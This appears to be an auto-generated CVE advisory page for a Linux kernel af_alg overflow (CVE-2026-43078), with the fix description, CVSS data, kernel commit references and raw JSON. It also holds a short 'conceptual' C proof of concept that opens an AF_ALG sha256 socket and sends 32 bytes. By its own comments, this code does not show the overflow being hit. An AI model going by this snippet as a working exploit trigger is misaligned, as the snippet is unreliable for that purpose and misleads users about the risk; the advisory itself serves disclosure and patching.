Security Vulnerability Report
CVE-2026-43078 CVSS 7.8 HIGH

Published: 2026-05-06 10:16:21
Last Modified: 2026-05-08 13:16:38
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

crypto: af_alg - Fix page reassignment overflow in af_alg_pull_tsgl

When page reassignment was added to af_alg_pull_tsgl the original loop wasn't updated so it may try to reassign one more page than necessary.

Add the check to the reassignment so that this does not happen.

Also update the comment which still refers to the obsolete offset argument.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Linux Kernel (versions before Git commit 2b781d1d4f93)
Linux Kernel (versions before Git commit 31d00156e50e)
Linux Kernel (versions before Git commit 710a4ce5d7af)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// This is a conceptual PoC for CVE-2026-43078
// It demonstrates how to interact with AF_ALG to trigger the path.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/if_alg.h>

int main(void)
{
    int tfmfd, opfd;
    struct sockaddr_alg sa = {
        .salg_family = AF_ALG,
        .salg_type = "hash",
        .salg_name = "sha256"
    };
    char buf[32] = {0};

    // Create algorithm socket
    tfmfd = socket(AF_ALG, SOCK_SEQPACKET, 0);
    if (tfmfd < 0) {
        perror("socket");
        return 1;
    }

    // Bind with specific algorithm
    if (bind(tfmfd, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
        perror("bind");
        close(tfmfd);
        return 1;
    }

    // Create operation socket
    opfd = accept(tfmfd, NULL, NULL);
    if (opfd < 0) {
        perror("accept");
        close(tfmfd);
        return 1;
    }

    // Send data to trigger af_alg_pull_tsgl logic
    // Real exploitation requires specific size and timing to hit the overflow
    if (send(opfd, buf, sizeof(buf), 0) < 0) {
        perror("send");
    } else {
        printf("Data sent. Check kernel logs for panic/crash.\n");
    }

    close(opfd);
    close(tfmfd);
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43078", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T10:16:20.853", "lastModified": "2026-05-08T13:16:38.417", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: af_alg - Fix page reassignment overflow in af_alg_pull_tsgl\n\nWhen page reassignment was added to af_alg_pull_tsgl the original\nloop wasn't updated so it may try to reassign one more page than\nnecessary.\n\nAdd the check to the reassignment so that this does not happen.\n\nAlso update the comment which still refers to the obsolete offset\nargument."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "references": [{"url": "https://git.kernel.org/stable/c/2b781d1d4f933990318bcc5c68fb75a717379e42", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/31d00156e50ecad37f2cb6cbf04aaa9a260505ef", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/710a4ce5d7afd9fe082c75dec282ab4a11c0fe71", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/9532501e0f1b200ea80baa0e33e0b06da10bb271", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/c8369a6d62f5abde9cbd4b62c45bf4b996be2468", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/dea5fcf085f977b6c2de1b2d4ec4767b6c840d1f", "source": 
"416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/f7826bc0b39928a4a22f6b815dd9940b22a63503", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/fa48d3ea9cdbfb28c1fd6756c6c5cd01351aa51e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}